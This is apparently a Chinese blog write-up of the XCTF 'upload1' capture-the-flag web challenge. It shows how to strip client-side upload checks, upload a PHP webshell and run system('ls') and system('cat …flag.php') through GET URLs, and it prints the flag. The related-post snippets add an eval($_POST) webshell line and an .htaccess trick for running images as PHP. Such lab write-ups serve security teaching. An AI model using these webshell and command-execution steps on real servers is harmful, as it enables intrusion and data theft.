攻防世界的里的upload1

最新推荐文章于 2024-07-24 23:00:08 发布
最新推荐文章于 2024-07-24 23:00:08 发布
阅读量591 收藏 3
点赞数 1
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71274136/article/details/130552143
版权

攻防世界的里的upload1

点击后的页面

 

看一下我的一句话木马

明确目标,获取flag

1.判断上传文件漏洞

先传入.php文件,看是否拦截

 可以看出,我刚选择我的.php文件就被报错提示了,说明这是前端验证啊!

你看,还不让我上传,上传键还变灰色了

如何判断是否为前端验证?

上传.php文件,立即报错,并且你开了代理,截取不到包,这样妥妥的前端验证,因为前端直接把你的文件进行拦截了嘛

2.解决方法

前端验证,我们用最快的方法,直接修改页面源代码就行(这里建议使用火狐或者谷歌浏览器,我用微软浏览器,修改了也不行)

我们右键,选择检查——产看源代码

 查form

 删掉 οnchange="check();"

这个语句的意思就是一个事件,当带点击上传的时候触发,至于具体是什么事件,你可以自己看源代码

上传时又提示,我们再进行删除源代码,删除这个disable,点击上传 

上传成功后,我们获得路径,现在去调用这个一句话木马

 调用方法有很多,我们手动调用,蚁剑好像用不了,他防着的嘞。

2.调用一句话木马

1)手动调用

中间因为个人原因,换了一下一下代码,换成GET了,之前上传成POST了

现在我们测试一下,看上传的文件是否能用,这里我们使用phpinfo();测试,出现下面的图就代表可以使用。

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=phpinfo();

我们去看看当前位置有什么文件,用system()函数

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system('ls');

可以看出我传了两次,也可以看出这时linux系统,因为我用的ls

 我们去根目录下看看

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system(%27ls%20/var/www/html%27);

看见flag.php文件了吧,打开看看

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system(%27cat%20/var/www/html/flag.php%27);

他是再检查里出现的,右键空白处,检查
flag="cyberpeace{c763321c1ebc2ab91da91506a35736f1}";

一大口木
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界-upload
qq_44065556的博客
09-24 1159
进入场景映入眼帘 需要注册账号 注册好之后,登录跳转页面 突破点应该就在这了 我们先上传一个php文件 显示不正确的文件扩展名,被拦了 用burp抓包改信息 成功上传 但是没有上传路径 只能上传不能利用 思考(题目给的是upload,给的引导思路 就是上传文件拿flag) 我试着上传jpg,png格式的图片文件 有文件名回显,这说明文件已经被传到了数据库中,游览器又从数据库中读取了上传的文件,那么这个过程久有可能触发sql注入 ...
攻防世界CTF题:upload1
Aixwei的博客
04-11 1007
发现这有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
攻防世界upload1
bjml_的博客
11-06 726
攻防世界upload1
攻防世界upload1、[ACTF2020 新生赛]Upload、[极客大挑战 2019]Upload、[MRCTF2020]你传你呢、[GXYCTF2019]BabyUpload
cyy001128的博客
04-29 336
补充:只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所有以.jpg后缀的文件全都当作php文件来执行),上传成功后再上传jpg文件就可以了。接着上传jpg文件,可以发现上传成功,那是因为.htaccess文件自动将1.jpg文件当作php解析了。尝试先上传一个.htaccess文件,抓包更改content-type后,在重放器测试发现中有回显。上传jpg文件,抓包更改后缀,发现php后缀无法上传。先尝试上传一个php文件,发现有白名单。
攻防世界upload1(web)
yuanxu8877的博客
11-22 1058
攻防世界web-upload1
file upload 攻防世界_攻防世界upload1
weixin_39760368的博客
12-21 111
打开一看是文件上传题1.先上个php一句话(提示上传图片) 一句话:2.发现有前端js验证3.推荐添加一个火狐的插件非常好用启用插件关闭js即可上传成功,并给出了路径4.然后添加路径访问,构造url使用system命令执行即可取得flaghttp://220.249.52.134:56156/upload/1608189359.a.php/?a=system('ls ../');在上级目录得到...
xctf攻防世界 upload1
m0_71282722的博客
05-08 207
此时将木马文件后缀改为jpg,一会再用bp改过来。查看flag.php 找到flag。第二种上传方式:使用bp绕过。第一种:前端绕过,删除约束。此时能上传php文件了。
攻防世界-Web-upload1
Welcome To Myon'Blog !
03-27 267
一句话木马,文件上传,绕过,PHP,抓包改包放包,burp使用,蚁剑用法
file upload 攻防世界_攻防世界-upload1
weixin_39710991的博客
12-30 141
先打开实验环境实验准备:Firefox浏览器+Burp+蚁剑Burp:用于代理浏览器处理的http信息蚁剑:用于一句话木马的文件连接1.1这选择后缀名为php的文件,发现浏览器很快就做出反应了,ctrl+u看下网页源代码,(可能是js前端的过滤,因为反应太快了);果然是前端js过滤了,只允许后缀为jpg和png的文件上传;1.2解决办法:先准备好含有一句话木马的php文件,密码为zxc(zxc可...
攻防世界upload1解题过程
小诺言的博客
02-22 5598
1:这是文件上传漏洞的简单题目,查看网页源代码发现这个 审计发现这是Java Script,对上传的文件格式进行了限制; 2:打开需要用到的工具,蚁* ,菜* 等等,坏了就再找一个,还有bp,我配合bp做的,没有的用这个<?php eval($_POST['a']); ?>,密码a. 3:上传一句话马后,抓到迫使特请求包,进行Repeater,将filename下的xxxxxx.jpg后缀改成php, rh就能成功连接了,右边Response的Upload success面的..
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
攻防世界杂项流量分析1
11-14
攻防世界杂项流量分析1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840807
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
网站基本布局CSS
m0_46608027的博客
07-24 791
* 滚动条轨道样式 *//* 滚动条样式 *//* 滑块样式 */
ASP.NET Web Api 使用 EF 6,DateTime 字段如何取数据库服务器当前时间
最新发布
yangshuquan的专栏
07-24 785
在做数据库设计时,为了方便进行数据追踪,通常会有几个字段是每个表都有的,比如创建时间、创建人、更新时间、更新人等,这些时间字段一般存储的是数据库服务器的时间,EF 是操作整个数据表对象,所以需要寻找方法来实现这个目的。本文分享 DB First 和 Code First 两种模式的 EF 中 DateTime 字段如何存储数据库服务器当前时间的方法。
TS如何处理js模块的类型?
闻人放歌的三寸青草园圃
07-24 255
【代码】TS如何处理js模块的类型?
Vue使用FullCalendar实现日历/周历/月历
_小郑有点困了的博客
07-23 342
需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。
攻防世界upload1
07-28
抱歉,我无法回答这个问题。 #### 引用[.reference_title] - *1* [攻防世界-upload1-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125274195)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值